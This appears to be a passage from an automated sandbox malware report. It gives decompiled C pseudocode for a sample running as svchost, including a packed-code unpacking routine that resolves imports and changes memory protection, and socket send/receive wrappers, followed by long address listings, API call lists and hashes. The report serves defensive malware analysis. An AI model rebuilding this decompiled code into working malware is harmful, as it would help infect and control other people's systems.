                                                                                                                                                                                                                                                                          							_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                          							if(_t138 == 0) {
                                                                                                                                                                                                                                                                          								_t138 =  *_t177;
                                                                                                                                                                                                                                                                          								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							asm("adc eax, eax");
                                                                                                                                                                                                                                                                          							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                          							if(_t139 == 0) {
                                                                                                                                                                                                                                                                          								_t139 =  *_t177;
                                                                                                                                                                                                                                                                          								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                          								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							asm("adc eax, eax");
                                                                                                                                                                                                                                                                          							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                          							_t186 = _t140;
                                                                                                                                                                                                                                                                          							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                                                          						_t138 = _t138 + _t138;
                                                                                                                                                                                                                                                                          						__eflags = _t138;
                                                                                                                                                                                                                                                                          					} while (_t138 != 0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}























































                                                                                                                                                                                                                                                                          0x0408bf20
                                                                                                                                                                                                                                                                          0x0408bf21
                                                                                                                                                                                                                                                                          0x0408bf26
                                                                                                                                                                                                                                                                          0x0408bf26
                                                                                                                                                                                                                                                                          0x0408bf2c
                                                                                                                                                                                                                                                                          0x0408bf3a
                                                                                                                                                                                                                                                                          0x0408bf3a
                                                                                                                                                                                                                                                                          0x0408bf3c
                                                                                                                                                                                                                                                                          0x0408bf3f
                                                                                                                                                                                                                                                                          0x0408bf41
                                                                                                                                                                                                                                                                          0x0408bf41
                                                                                                                                                                                                                                                                          0x0408bf30
                                                                                                                                                                                                                                                                          0x0408bf32
                                                                                                                                                                                                                                                                          0x0408bf33
                                                                                                                                                                                                                                                                          0x0408bf35
                                                                                                                                                                                                                                                                          0x0408bf35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bf35
                                                                                                                                                                                                                                                                          0x0408bf43
                                                                                                                                                                                                                                                                          0x0408bf48
                                                                                                                                                                                                                                                                          0x0408bf48
                                                                                                                                                                                                                                                                          0x0408bf4a
                                                                                                                                                                                                                                                                          0x0408bf4c
                                                                                                                                                                                                                                                                          0x0408bf4e
                                                                                                                                                                                                                                                                          0x0408bf51
                                                                                                                                                                                                                                                                          0x0408bf51
                                                                                                                                                                                                                                                                          0x0408bf53
                                                                                                                                                                                                                                                                          0x0408bf55
                                                                                                                                                                                                                                                                          0x0408bf55
                                                                                                                                                                                                                                                                          0x0408bf57
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bf59
                                                                                                                                                                                                                                                                          0x0408bf59
                                                                                                                                                                                                                                                                          0x0408bf83
                                                                                                                                                                                                                                                                          0x0408bf83
                                                                                                                                                                                                                                                                          0x0408bf85
                                                                                                                                                                                                                                                                          0x0408bf85
                                                                                                                                                                                                                                                                          0x0408bf88
                                                                                                                                                                                                                                                                          0x0408bf9b
                                                                                                                                                                                                                                                                          0x0408bf9b
                                                                                                                                                                                                                                                                          0x0408bf9d
                                                                                                                                                                                                                                                                          0x0408bf9f
                                                                                                                                                                                                                                                                          0x0408bfa1
                                                                                                                                                                                                                                                                          0x0408bfa4
                                                                                                                                                                                                                                                                          0x0408bfa4
                                                                                                                                                                                                                                                                          0x0408bfa6
                                                                                                                                                                                                                                                                          0x0408bfa6
                                                                                                                                                                                                                                                                          0x0408bf74
                                                                                                                                                                                                                                                                          0x0408bf74
                                                                                                                                                                                                                                                                          0x0408bf74
                                                                                                                                                                                                                                                                          0x0408bf76
                                                                                                                                                                                                                                                                          0x0408bf78
                                                                                                                                                                                                                                                                          0x0408bf7a
                                                                                                                                                                                                                                                                          0x0408bf7d
                                                                                                                                                                                                                                                                          0x0408bf7d
                                                                                                                                                                                                                                                                          0x0408bf7f
                                                                                                                                                                                                                                                                          0x0408bfd5
                                                                                                                                                                                                                                                                          0x0408bfd5
                                                                                                                                                                                                                                                                          0x0408bfdb
                                                                                                                                                                                                                                                                          0x0408bfde
                                                                                                                                                                                                                                                                          0x0408bfe1
                                                                                                                                                                                                                                                                          0x0408bfe4
                                                                                                                                                                                                                                                                          0x0408bff4
                                                                                                                                                                                                                                                                          0x0408bff4
                                                                                                                                                                                                                                                                          0x0408bff6
                                                                                                                                                                                                                                                                          0x0408bff9
                                                                                                                                                                                                                                                                          0x0408bffb
                                                                                                                                                                                                                                                                          0x0408bffe
                                                                                                                                                                                                                                                                          0x0408bffe
                                                                                                                                                                                                                                                                          0x0408bffe
                                                                                                                                                                                                                                                                          0x0408c003
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfe6
                                                                                                                                                                                                                                                                          0x0408bfe6
                                                                                                                                                                                                                                                                          0x0408bfe6
                                                                                                                                                                                                                                                                          0x0408bfe8
                                                                                                                                                                                                                                                                          0x0408bfe9
                                                                                                                                                                                                                                                                          0x0408bfeb
                                                                                                                                                                                                                                                                          0x0408bfec
                                                                                                                                                                                                                                                                          0x0408bfec
                                                                                                                                                                                                                                                                          0x0408bfec
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfef
                                                                                                                                                                                                                                                                          0x0408bfa8
                                                                                                                                                                                                                                                                          0x0408bfa9
                                                                                                                                                                                                                                                                          0x0408bfa9
                                                                                                                                                                                                                                                                          0x0408bfab
                                                                                                                                                                                                                                                                          0x0408bfad
                                                                                                                                                                                                                                                                          0x0408bfaf
                                                                                                                                                                                                                                                                          0x0408bfb2
                                                                                                                                                                                                                                                                          0x0408bfb2
                                                                                                                                                                                                                                                                          0x0408bfb4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x0408bfb6
                                                                                                                                                                                                                                                                          0x0408bfb8
                                                                                                                                                                                                                                                                          0x0408bfba
                                                                                                                                                                                                                                                                          0x0408bfbc
                                                                                                                                                                                                                                                                          0x0408bfbf
                                                                                                                                                                                                                                                                          0x0408bfbf
                                                                                                                                                                                                                                                                          0x0408bfc1
                                                                                                                                                                                                                                                                          0x0408bfc3
                                                                                                                                                                                                                                                                          0x0408bfc3
                                                                                                                                                                                                                                                                          0x0408bfc3
                                                                                                                                                                                                                                                                          0x0408bfc7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfc9
                                                                                                                                                                                                                                                                          0x0408bfcb
                                                                                                                                                                                                                                                                          0x0408bfcb
                                                                                                                                                                                                                                                                          0x0408bfce
                                                                                                                                                                                                                                                                          0x0408bfce
                                                                                                                                                                                                                                                                          0x0408bfd2
                                                                                                                                                                                                                                                                          0x0408bfd2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bfd2
                                                                                                                                                                                                                                                                          0x0408bfb4
                                                                                                                                                                                                                                                                          0x0408bf8d
                                                                                                                                                                                                                                                                          0x0408bf8f
                                                                                                                                                                                                                                                                          0x0408bf90
                                                                                                                                                                                                                                                                          0x0408bf90
                                                                                                                                                                                                                                                                          0x0408bf93
                                                                                                                                                                                                                                                                          0x0408c00a
                                                                                                                                                                                                                                                                          0x0408c00b
                                                                                                                                                                                                                                                                          0x0408c00d
                                                                                                                                                                                                                                                                          0x0408c012
                                                                                                                                                                                                                                                                          0x0408c012
                                                                                                                                                                                                                                                                          0x0408c012
                                                                                                                                                                                                                                                                          0x0408c012
                                                                                                                                                                                                                                                                          0x0408c014
                                                                                                                                                                                                                                                                          0x0408c017
                                                                                                                                                                                                                                                                          0x0408c017
                                                                                                                                                                                                                                                                          0x0408c01b
                                                                                                                                                                                                                                                                          0x0408c01b
                                                                                                                                                                                                                                                                          0x0408c029
                                                                                                                                                                                                                                                                          0x0408c035
                                                                                                                                                                                                                                                                          0x0408c037
                                                                                                                                                                                                                                                                          0x0408c03c
                                                                                                                                                                                                                                                                          0x0408c03e
                                                                                                                                                                                                                                                                          0x0408c03e
                                                                                                                                                                                                                                                                          0x0408c044
                                                                                                                                                                                                                                                                          0x0408c044
                                                                                                                                                                                                                                                                          0x0408c046
                                                                                                                                                                                                                                                                          0x0408c046
                                                                                                                                                                                                                                                                          0x0408c048
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408c04a
                                                                                                                                                                                                                                                                          0x0408c054
                                                                                                                                                                                                                                                                          0x0408c057
                                                                                                                                                                                                                                                                          0x0408c057
                                                                                                                                                                                                                                                                          0x0408c060
                                                                                                                                                                                                                                                                          0x0408c061
                                                                                                                                                                                                                                                                          0x0408c063
                                                                                                                                                                                                                                                                          0x0408c064
                                                                                                                                                                                                                                                                          0x0408c066
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408c06a
                                                                                                                                                                                                                                                                          0x0408c070
                                                                                                                                                                                                                                                                          0x0408c071
                                                                                                                                                                                                                                                                          0x0408c071
                                                                                                                                                                                                                                                                          0x0408c072
                                                                                                                                                                                                                                                                          0x0408c075
                                                                                                                                                                                                                                                                          0x0408c07e
                                                                                                                                                                                                                                                                          0x0408c07e
                                                                                                                                                                                                                                                                          0x0408c080
                                                                                                                                                                                                                                                                          0x0408c089
                                                                                                                                                                                                                                                                          0x0408c082
                                                                                                                                                                                                                                                                          0x0408c082
                                                                                                                                                                                                                                                                          0x0408c084
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408c084
                                                                                                                                                                                                                                                                          0x0408c080
                                                                                                                                                                                                                                                                          0x0408c061
                                                                                                                                                                                                                                                                          0x0408c08f
                                                                                                                                                                                                                                                                          0x0408c08f
                                                                                                                                                                                                                                                                          0x0408c092
                                                                                                                                                                                                                                                                          0x0408c092
                                                                                                                                                                                                                                                                          0x0408c095
                                                                                                                                                                                                                                                                          0x0408c099
                                                                                                                                                                                                                                                                          0x0408c09a
                                                                                                                                                                                                                                                                          0x0408c09a
                                                                                                                                                                                                                                                                          0x0408c09c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408c09e
                                                                                                                                                                                                                                                                          0x0408c0a0
                                                                                                                                                                                                                                                                          0x0408c0b8
                                                                                                                                                                                                                                                                          0x0408c0bb
                                                                                                                                                                                                                                                                          0x0408c0bb
                                                                                                                                                                                                                                                                          0x0408c0a2
                                                                                                                                                                                                                                                                          0x0408c0a8
                                                                                                                                                                                                                                                                          0x0408c0af
                                                                                                                                                                                                                                                                          0x0408c0af
                                                                                                                                                                                                                                                                          0x0408c0c0
                                                                                                                                                                                                                                                                          0x0408c0c0
                                                                                                                                                                                                                                                                          0x0408c0c6
                                                                                                                                                                                                                                                                          0x0408c0c6
                                                                                                                                                                                                                                                                          0x0408c0cc
                                                                                                                                                                                                                                                                          0x0408c0d1
                                                                                                                                                                                                                                                                          0x0408c0d7
                                                                                                                                                                                                                                                                          0x0408c0d9
                                                                                                                                                                                                                                                                          0x0408c0d9
                                                                                                                                                                                                                                                                          0x0408c0df
                                                                                                                                                                                                                                                                          0x0408c0e2
                                                                                                                                                                                                                                                                          0x0408c0e2
                                                                                                                                                                                                                                                                          0x0408c0e2
                                                                                                                                                                                                                                                                          0x0408c0e6
                                                                                                                                                                                                                                                                          0x0408c0e7
                                                                                                                                                                                                                                                                          0x0408c0ec
                                                                                                                                                                                                                                                                          0x0408c0ef
                                                                                                                                                                                                                                                                          0x0408c0f0
                                                                                                                                                                                                                                                                          0x0408c0f4
                                                                                                                                                                                                                                                                          0x0408c0f4
                                                                                                                                                                                                                                                                          0x0408c0f6
                                                                                                                                                                                                                                                                          0x0408c0f6
                                                                                                                                                                                                                                                                          0x0408c0fa
                                                                                                                                                                                                                                                                          0x04001780
                                                                                                                                                                                                                                                                          0x04001781
                                                                                                                                                                                                                                                                          0x04001783
                                                                                                                                                                                                                                                                          0x04001789
                                                                                                                                                                                                                                                                          0x0400178f
                                                                                                                                                                                                                                                                          0x04001790
                                                                                                                                                                                                                                                                          0x04001795
                                                                                                                                                                                                                                                                          0x0400179a
                                                                                                                                                                                                                                                                          0x0400179c
                                                                                                                                                                                                                                                                          0x040019a0
                                                                                                                                                                                                                                                                          0x040019a2
                                                                                                                                                                                                                                                                          0x040019a2
                                                                                                                                                                                                                                                                          0x040017a2
                                                                                                                                                                                                                                                                          0x040017ac
                                                                                                                                                                                                                                                                          0x040017b6
                                                                                                                                                                                                                                                                          0x040017b6
                                                                                                                                                                                                                                                                          0x040017bb
                                                                                                                                                                                                                                                                          0x040017c1
                                                                                                                                                                                                                                                                          0x040017c8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040017ce
                                                                                                                                                                                                                                                                          0x040017d8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040017ec
                                                                                                                                                                                                                                                                          0x040017ff
                                                                                                                                                                                                                                                                          0x04001804
                                                                                                                                                                                                                                                                          0x04001807
                                                                                                                                                                                                                                                                          0x0400180d
                                                                                                                                                                                                                                                                          0x04001814
                                                                                                                                                                                                                                                                          0x04001822
                                                                                                                                                                                                                                                                          0x0400182c
                                                                                                                                                                                                                                                                          0x04001831
                                                                                                                                                                                                                                                                          0x04001834
                                                                                                                                                                                                                                                                          0x04001840
                                                                                                                                                                                                                                                                          0x04001859
                                                                                                                                                                                                                                                                          0x04001867
                                                                                                                                                                                                                                                                          0x04001870
                                                                                                                                                                                                                                                                          0x0400188b
                                                                                                                                                                                                                                                                          0x0400188b
                                                                                                                                                                                                                                                                          0x04001891
                                                                                                                                                                                                                                                                          0x040018ac
                                                                                                                                                                                                                                                                          0x040018ac
                                                                                                                                                                                                                                                                          0x040018b3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                          0x040018d2
                                                                                                                                                                                                                                                                          0x040018d5
                                                                                                                                                                                                                                                                          0x040018db
                                                                                                                                                                                                                                                                          0x040018e2
                                                                                                                                                                                                                                                                          0x040018f4
                                                                                                                                                                                                                                                                          0x040018fe
                                                                                                                                                                                                                                                                          0x04001903
                                                                                                                                                                                                                                                                          0x04001906
                                                                                                                                                                                                                                                                          0x04001912
                                                                                                                                                                                                                                                                          0x0400191e
                                                                                                                                                                                                                                                                          0x0400191e
                                                                                                                                                                                                                                                                          0x04001931
                                                                                                                                                                                                                                                                          0x0400193f
                                                                                                                                                                                                                                                                          0x04001948
                                                                                                                                                                                                                                                                          0x04001963
                                                                                                                                                                                                                                                                          0x04001963
                                                                                                                                                                                                                                                                          0x040018a3
                                                                                                                                                                                                                                                                          0x040018a3
                                                                                                                                                                                                                                                                          0x040018a6
                                                                                                                                                                                                                                                                          0x040018a6
                                                                                                                                                                                                                                                                          0x04001976
                                                                                                                                                                                                                                                                          0x04001981
                                                                                                                                                                                                                                                                          0x0400199b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400198b
                                                                                                                                                                                                                                                                          0x04001990
                                                                                                                                                                                                                                                                          0x04001990
                                                                                                                                                                                                                                                                          0x040017b6
                                                                                                                                                                                                                                                                          0x0408bf97
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bf97
                                                                                                                                                                                                                                                                          0x0408bf5b
                                                                                                                                                                                                                                                                          0x0408bf5d
                                                                                                                                                                                                                                                                          0x0408bf60
                                                                                                                                                                                                                                                                          0x0408bf62
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bf64
                                                                                                                                                                                                                                                                          0x0408bf64
                                                                                                                                                                                                                                                                          0x0408bf65
                                                                                                                                                                                                                                                                          0x0408bf67
                                                                                                                                                                                                                                                                          0x0408bf69
                                                                                                                                                                                                                                                                          0x0408bf6b
                                                                                                                                                                                                                                                                          0x0408bf6e
                                                                                                                                                                                                                                                                          0x0408bf6e
                                                                                                                                                                                                                                                                          0x0408bf70
                                                                                                                                                                                                                                                                          0x0408bf48
                                                                                                                                                                                                                                                                          0x0408bf4a
                                                                                                                                                                                                                                                                          0x0408bf4c
                                                                                                                                                                                                                                                                          0x0408bf4e
                                                                                                                                                                                                                                                                          0x0408bf51
                                                                                                                                                                                                                                                                          0x0408bf51
                                                                                                                                                                                                                                                                          0x0408bf53
                                                                                                                                                                                                                                                                          0x0408bf55
                                                                                                                                                                                                                                                                          0x0408bf55
                                                                                                                                                                                                                                                                          0x0408bf57
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0408bf57
                                                                                                                                                                                                                                                                          0x0408bf36
                                                                                                                                                                                                                                                                          0x0408bf36
                                                                                                                                                                                                                                                                          0x0408bf36
                                                                                                                                                                                                                                                                          0x0408bf36
                                                                                                                                                                                                                                                                          0x0408bf41

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1996367037-0
                                                                                                                                                                                                                                                                          • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                          • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 219 4001040-400104a 220 4001052-4001054 219->220 221 400104c-4001050 219->221 223 40010d3-40010d6 220->223 221->220 222 4001056 221->222 224 400105d-4001061 222->224 225 4001063-4001065 224->225 226 4001067-4001084 recv 224->226 225->223 227 4001086-400108c 226->227 228 400109f-40010a3 226->228 227->228 229 400108e-4001092 227->229 230 40010a5 228->230 231 40010a7-40010ab 228->231 229->228 232 4001094-400109d GetTickCount 229->232 233 40010c3-40010c7 230->233 234 40010ad 231->234 235 40010af-40010c1 231->235 232->228 236 40010d1 233->236 237 40010c9-40010cf 233->237 234->233 235->224 236->223 237->236
                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                          			E04001040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					while(_a12 != 0) {
                                                                                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                                                                                          						_t26 = _a12;
                                                                                                                                                                                                                                                                          						_push(_t26);
                                                                                                                                                                                                                                                                          						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                          						_push(_a4); // executed
                                                                                                                                                                                                                                                                          						L04001024(); // executed
                                                                                                                                                                                                                                                                          						_v12 = _t26;
                                                                                                                                                                                                                                                                          						if(_a20 != 0 &&  *_a20 == 0 && _v12 > 0) {
                                                                                                                                                                                                                                                                          							 *_a20 = GetTickCount();
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v12 >= 0) {
                                                                                                                                                                                                                                                                          							if(_v12 != 0) {
                                                                                                                                                                                                                                                                          								_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                          								_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                                                          							if(_a16 != 0) {
                                                                                                                                                                                                                                                                          								 *_a16 = _v8;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x0400104a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001056
                                                                                                                                                                                                                                                                          0x04001056
                                                                                                                                                                                                                                                                          0x0400105d
                                                                                                                                                                                                                                                                          0x04001067
                                                                                                                                                                                                                                                                          0x04001069
                                                                                                                                                                                                                                                                          0x0400106c
                                                                                                                                                                                                                                                                          0x04001073
                                                                                                                                                                                                                                                                          0x04001077
                                                                                                                                                                                                                                                                          0x04001078
                                                                                                                                                                                                                                                                          0x0400107d
                                                                                                                                                                                                                                                                          0x04001084
                                                                                                                                                                                                                                                                          0x0400109d
                                                                                                                                                                                                                                                                          0x0400109d
                                                                                                                                                                                                                                                                          0x040010a3
                                                                                                                                                                                                                                                                          0x040010ab
                                                                                                                                                                                                                                                                          0x040010b5
                                                                                                                                                                                                                                                                          0x040010be
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040010be
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040010a5
                                                                                                                                                                                                                                                                          0x040010c3
                                                                                                                                                                                                                                                                          0x040010c7
                                                                                                                                                                                                                                                                          0x040010cf
                                                                                                                                                                                                                                                                          0x040010cf
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040010d1
                                                                                                                                                                                                                                                                          0x040010a3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001063

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CountTickrecv
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1874678310-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                                          • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 238 40010e0-40010ea 239 40010f2-40010f4 238->239 240 40010ec-40010f0 238->240 242 400114d-4001150 239->242 240->239 241 40010f6 240->241 243 40010fd-4001101 241->243 244 4001103-4001120 send 243->244 245 400113a-400114b send 243->245 246 4001122-4001124 244->246 247 4001126-4001138 244->247 245->242 246->242 247->243
                                                                                                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                                                                                                          			E040010E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					while(_a12 != 0) {
                                                                                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                                                                                          						_t22 = _a12;
                                                                                                                                                                                                                                                                          						_push(_t22);
                                                                                                                                                                                                                                                                          						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                          						_push(_a4); // executed
                                                                                                                                                                                                                                                                          						L04001012(); // executed
                                                                                                                                                                                                                                                                          						_v12 = _t22;
                                                                                                                                                                                                                                                                          						if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                          							_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                                          					_push(_a8);
                                                                                                                                                                                                                                                                          					_push(_a4); // executed
                                                                                                                                                                                                                                                                          					L04001012(); // executed
                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x040010ea
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040010f6
                                                                                                                                                                                                                                                                          0x040010f6
                                                                                                                                                                                                                                                                          0x040010fd
                                                                                                                                                                                                                                                                          0x04001103
                                                                                                                                                                                                                                                                          0x04001105
                                                                                                                                                                                                                                                                          0x04001108
                                                                                                                                                                                                                                                                          0x0400110f
                                                                                                                                                                                                                                                                          0x04001113
                                                                                                                                                                                                                                                                          0x04001114
                                                                                                                                                                                                                                                                          0x04001119
                                                                                                                                                                                                                                                                          0x04001120
                                                                                                                                                                                                                                                                          0x0400112c
                                                                                                                                                                                                                                                                          0x04001135
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001135
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001122
                                                                                                                                                                                                                                                                          0x0400113a
                                                                                                                                                                                                                                                                          0x0400113c
                                                                                                                                                                                                                                                                          0x04001141
                                                                                                                                                                                                                                                                          0x04001145
                                                                                                                                                                                                                                                                          0x04001146
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400114b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04001114
